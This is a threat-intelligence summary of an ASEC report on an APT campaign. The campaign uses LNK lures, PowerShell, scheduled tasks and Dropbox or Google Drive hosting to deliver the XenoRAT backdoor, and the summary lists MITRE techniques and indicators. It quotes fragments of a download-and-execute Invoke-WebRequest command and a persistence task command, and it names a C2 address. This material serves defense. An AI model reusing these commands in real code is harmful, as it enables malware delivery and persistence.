Threat Research

APT Attacks Leveraging Cloud Storage

Ahnlab

ASEC reports attacks where threat actors leverage cloud storage services to host decoy documents and malware, including the XenoRAT backdoor, for targeted campaigns. The operation uses LNK shortcuts that invoke PowerShell, downloads and registers follow-on scripts via Task Scheduler, and retrieves additional payloads from cloud storage to expand the infection. #XenoRAT #PoliceCyberInvestigationBureau #Dropbox #GoogleDrive

Keypoints

  • The campaign uses cloud storage (Dropbox, Google Drive, OneDrive) to host malicious scripts and decoy documents for distribution.
  • Initial access is via a shortcut file (LNK) disguised as a harmless HTML document to lure users into clicking.
  • The LNK contains PowerShell commands that decodes and runs payloads saved as ms_temp_08.ps1 in TEMP.
  • ms_temp_08.ps1 downloads decoy documents and registers a Task Scheduler entry to run on a schedule (MicrosoftUpdate every 30 minutes).
  • Decoy documents and script files (SoJ****-F.txt, SoJ****-X.txt, etc.) are hosted per target and use Dropbox tokens to fetch additional malware via cloud storage.
  • The malware chain culminates in XenoRAT, with C2 at 159.100.29.122:8811 and a swolf-20010512 mutex; actors collect personal data and target pre-designated individuals.

MITRE Techniques

  • [T1036] Masquerading – The LNK file is disguised as an HTML document file… “The LNK file is disguised as an HTML document file as seen below and has a name that lures users to click it.”
  • [T1204.002] User Execution – The LNK file lures users to click it (Police Cyber Investigation Bureau – Internet Use History (check now to keep your PC safe).html.lnk).
  • [T1059.001] PowerShell – The LNK file contains PowerShell commands. The file decodes Base64-encoded commands after being run and executes the commands after saving them as the ms_temp_08.ps1 file inside the TEMP folder. “The LNK file contains PowerShell commands.”
  • [T1027] Obfuscated/Compressed Files and Information – The threat actor changed the front part of the file (file signature) so that it looks like the RTF document format; The decompressed data is a C# (.NET) file. “The threat actor changed the front part of the file (file signature) as shown below so that it looks like the RTF document format.” And “The decompressed data is a C# (.NET) file.”
  • [T1053.005] Scheduled Task – The script registers a Scheduled Task to run periodically: “Register-ScheduledTask -TaskName ‘MicrosoftUpdate’ … -RepetitionInterval (New-TimeSpan -Minutes 30)”; The article notes it is run every 30 minutes.
  • [T1105] Ingress Tool Transfer – The PowerShell commands download decoy documents and additional files from cloud storage via Invoke-WebRequest, e.g., “Invoke-WebRequest -Uri ‘hxxps://dl.dropboxusercontent[.]com/…’ -OutFile $hhh; & $hhh;”
  • [T1041] Exfiltration Over C2 Channel – The first PS1 script collects PC information and uploads it to Dropbox, indicating data exfiltration to cloud storage before further actions.

Indicators of Compromise

  • [MD5] File hashes – LNK: c45d209f666f77d70bed61e6fca48bc2; XenoRAT: 238cd8f609b06258ab8b4ded82ebbff8; and 8 more hashes (SCRIPT, etc.)
  • [IP] C2 server – 159.100.29.122:8811
  • [Domain] Cloud storage domains used – dropboxusercontent.com, drive.google.com
  • [File name] Decoy and payload file names – “Police Cyber Investigation Bureau – Internet Use History (check now to keep your PC safe).html.lnk”, “first.ps1”
  • [Email] Threat actor email addresses – [email protected], [email protected], [email protected], [email protected], [email protected]

Read more: https://asec.ahnlab.com/en/66429/